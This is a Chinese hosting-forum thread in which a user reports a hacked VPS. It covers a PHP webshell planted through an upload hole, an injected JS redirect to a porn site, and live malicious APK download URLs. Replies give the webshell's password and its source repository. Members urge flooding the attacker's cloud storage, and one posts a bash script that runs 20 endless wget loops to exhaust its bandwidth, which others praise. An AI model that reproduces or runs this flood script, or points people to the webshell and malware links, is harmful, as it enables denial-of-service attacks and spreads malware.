全球主机交流论坛

标题: 吃灰小鸡被挂马文件找到了大佬看下这个文件能干啥 [打印本页]

作者: laon 时间: 2021-1-13 19:04
标题: 吃灰小鸡被挂马文件找到了大佬看下这个文件能干啥

https://paste.ubuntu.com/p/Hy886CZQC7/

复制代码

PHP文件的木马
小鸡上网站所有HTML文件都被加上了一句加载JS的代码

https://m.yymhs.cc/tj.js

复制代码

作者: yxmss 时间: 2021-1-13 19:07
本帖最后由 yxmss 于 2021-1-13 19:11 编辑

大马
密码应该是：yzddmr6

开源地址：https://github.com/AYZRxx1/BestShell

作者: laon 时间: 2021-1-13 19:19

yxmss 发表于 2021-1-13 19:07
大马
密码应该是：yzddmr6

给我跳H网了，H网还用的阿里云CDN，我在剑皇了

作者: 主菜单 时间: 2021-1-13 19:23
root密码被爆破了么，还是前端程序漏洞？

作者: yxmss 时间: 2021-1-13 19:23

laon 发表于 2021-1-13 19:19
给我跳H网了，H网还用的阿里云CDN，我在剑皇了

那个js代码的作用是判断移动端设备跳转到http://1pvwjv1p.0avr4s.cn（PC端打不开，移动打开以后是H网）

作者: laon 时间: 2021-1-13 19:24

主菜单发表于 2021-1-13 19:23
root密码被爆破了么，还是前端程序漏洞？

是前端程序的漏洞，我看到是通过一个文件上传漏洞上传的

作者: ymh1147 时间: 2021-1-13 19:24
这个不是XX视频嘛，中招的还挺多

作者: laon 时间: 2021-1-13 19:25

yxmss 发表于 2021-1-13 19:23
那个js代码的作用是判断移动端设备跳转到http://1pvwjv1p.0avr4s.cn（PC端打不开，移动打开以后是H网） ...

感谢大佬解惑

作者: yxmss 时间: 2021-1-13 19:29

laon 发表于 2021-1-13 19:25
感谢大佬解惑

它安装包下载地址，阿里云oss北京区的：http://apkpej86unv.oss-cn-beijing.aliyuncs.com/dy120_cmm.apk

作者: laon 时间: 2021-1-13 19:36

yxmss 发表于 2021-1-13 19:29
它安装包下载地址，阿里云oss北京区的：http://apkpej86unv.oss-cn-beijing.aliyuncs.com/dy120_cmm.apk ...

谢谢大佬，OSS刷起来比CDN快多了

作者: cxmiao 时间: 2021-1-13 19:53
就是一个的大马

作者: jqbaobao 时间: 2021-1-13 19:56
本帖最后由 jqbaobao 于 2021-1-13 19:57 编辑

yxmss 发表于 2021-1-13 19:23
那个js代码的作用是判断移动端设备跳转到http://1pvwjv1p.0avr4s.cn（PC端打不开，移动打开以后是H网） ...

那这个要怎么cc呢，换ua吗
【https://apkpej86unv.shzxfdc.com.cn//dy120_cmm.apk 】

作者: laon 时间: 2021-1-13 20:10

jqbaobao 发表于 2021-1-13 19:56
那这个要怎么cc呢，换ua吗
【https://apkpej86unv.shzxfdc.com.cn//dy120_cmm.apk 】

他挂了CDN的，直接刷他的流量或者OSS

作者: red233 时间: 2021-1-13 20:19
提示: 作者被禁止或删除内容自动屏蔽

作者: 三和大神 时间: 2021-1-13 20:30

echo "while [ 1 ]" > _ins.sh
echo "do" >> _ins.sh
echo "wget -q -t0 -O /dev/null https://apkpej86unv.oss-cn-beijing.aliyuncs.com/dy120_cmm.apk" >> _ins.sh
echo "done" >> _ins.sh
for i in `seq 1 20`
do
nohup bash _ins.sh > /dev/null 2>&1 &
echo "thread $i start!"
done

复制代码

之前某位MJJ论坛发的剑皇Bash脚本

作者: skysf 时间: 2021-1-13 20:52

三和大神发表于 2021-1-13 20:30
之前某位MJJ论坛发的剑皇Bash脚本

这玩意启动了咋停止啊

作者: ddane 时间: 2021-1-13 20:58

三和大神发表于 2021-1-13 20:30
之前某位MJJ论坛发的剑皇Bash脚本

哈哈真贴心收藏了

作者: Winter 时间: 2021-1-14 13:53

小鸡不行，20线程就爆CPU了

作者: MSN 时间: 2021-1-14 14:16

laon 发表于 2021-1-13 04:19
给我跳H网了，H网还用的阿里云CDN，我在剑皇了

替我打500块钱的

作者: Mrvps 时间: 2021-1-14 14:19
提示: 作者被禁止或删除内容自动屏蔽

作者: Winter 时间: 2021-1-14 14:28

Mrvps 发表于 2021-1-14 14:19
这是嘛监控

FInalshell 挺好用的

作者: 奔跑吧蜗牛c 时间: 2021-1-14 16:00

Mrvps 发表于 2021-1-14 14:19
这是嘛监控

finalsheel自带的

作者: chinayang 时间: 2021-1-14 16:12
牛批啊，听得我瑟瑟发抖

欢迎光临全球主机交流论坛 (https://443502.xyz/)